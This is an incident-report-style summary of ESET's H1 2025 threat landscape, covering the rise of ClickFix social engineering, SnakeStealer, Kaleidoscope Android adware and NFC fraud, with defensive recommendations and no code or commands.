Full Report
A view of the H1 2025 threat landscape as seen by ESET telemetry and from the perspective of ESET threat detection and research experts
Analysis Summary
This summary is based on the summary provided for the ESET Threat Report H1 2025, focusing on observed security trends rather than a single, specific organizational incident.
# Incident Report: ESET H1 2025 Threat Landscape Overview
## Executive Summary
The first half of 2025 was marked by significant shifts in malware trends, highlighted by the rapid emergence of the ClickFix attack vector, which increased by over 500%. Infostealers also changed, with SnakeStealer replacing Agent Tesla, while ESET actively disrupted operations against Lumma Stealer and Danabot. On mobile, sophisticated Adware (Kaleidoscope) soared, and NFC-based fraud experienced exponential growth, indicating attackers' evolving adaptability across platforms.
## Incident Details
- **Discovery Date:** Throughout H1 2025 (Based on ESET Telemetry)
- **Incident Date:** H1 2025
- **Affected Organization:** Not a single organization; trends across global telemetry.
- **Sector:** All sectors globally (as reported by telemetry data)
- **Geography:** Global
## Timeline of Events
### Initial Access
- **Date/Time:** Initial emergence detected throughout H1 2025.
- **Vector:** ClickFix manipulation (second most common vector after phishing) and traditional phishing campaigns fueling NFC fraud.
- **Details:** ClickFix tricks users into executing malicious commands disguised as error fixes; Phishing fuels NFC fraud distribution.
### Lateral Movement
- Not explicitly detailed for a single organization, but payloads following ClickFix infiltration varied, including ransomware and nation-state malware, implying lateral movement capabilities as standard for these payloads.
### Data Exfiltration/Impact
- **Impact:** Infostealer activity (SnakeStealer being dominant); spreading of ransomware and nation-state malware; severe adware intrusions on Android (Kaleidoscope); NFC financial fraud.
### Detection & Response
- **How it was discovered:** Detected via ESET telemetry and research efforts.
- **Response actions taken:** ESET actively contributed to disruption operations targeting Lumma Stealer and Danabot malware-as-a-service threats.
## Attack Methodology
- **Initial Access:** ClickFix (deceptive execution command), Phishing.
- **Persistence:** Implied by the nature of deployed malware (infostealers, state-sponsored malware).
- **Privilege Escalation:** Not explicitly detailed, but necessary for full impact of deployed nation-state malware.
- **Defense Evasion:** Implied by the sophistication of threats like Kaleidoscope Adware.
- **Credential Access:** Dominated by SnakeStealer (new leading infostealer).
- **Discovery:** Not explicitly detailed.
- **Lateral Movement:** Implied by complex malware payload deployment.
- **Collection:** Infostealers (SnakeStealer).
- **Exfiltration:** Infostealers.
- **Impact:** Ransomware deployment, significant adware disruption (Kaleidoscope), and financial fraud via NFC exploitation.
## Impact Assessment
- **Financial:** Significant shifts in the ransomware economy (drop in ransom payments despite increased activity), new financial fraud via NFC.
- **Data Breach:** Prolific data theft via the rise of SnakeStealer as the top infostealer.
- **Operational:** Degradation of Android device performance due to Kaleidoscope adware. Disruption within the Ransomware-as-a-Service ecosystem.
- **Reputational:** Damage associated with major infostealer successes and widespread adware campaigns.
## Indicators of Compromise
- *Note: As this is a threat report summary, specific IoCs are not listed here (they require analysis of the full report beyond the provided text). Identified threats are: Agent Tesla (fading), SnakeStealer, Lumma Stealer, Danabot, Kaleidoscope (Android Adware), NGate, GhostTap, SuperCard (NFC threats).*
- **Behavioral indicators:** Users manipulated into executing malicious commands via ClickFix social engineering.
## Response Actions
- **Containment:** Not specified for individual victim environments.
- **Eradication:** ESET contributed to major disruption operations against Lumma and Danabot.
- **Recovery:** Not specified for individual victim environments.
## Lessons Learned
- **Key takeaways:** The threat landscape is highly dynamic, with social engineering techniques (ClickFix) growing exponentially to challenge long-standing methods like phishing. Mobile threats, particularly complex adware and NFC fraud, are rapidly evolving.
- **What could have been done better:** Increased vigilance against novel social engineering vectors like ClickFix is crucial.
## Recommendations
- Implement stronger user training specifically targeting unusual system prompts or "error-fixing" dialogs (ClickFix mitigation).
- Maintain up-to-date detection signatures to counter emerging infostealers like SnakeStealer.
- Implement layered security controls to monitor and restrict unauthorized NFC interactions, given the thirty-five-fold increase in related fraud.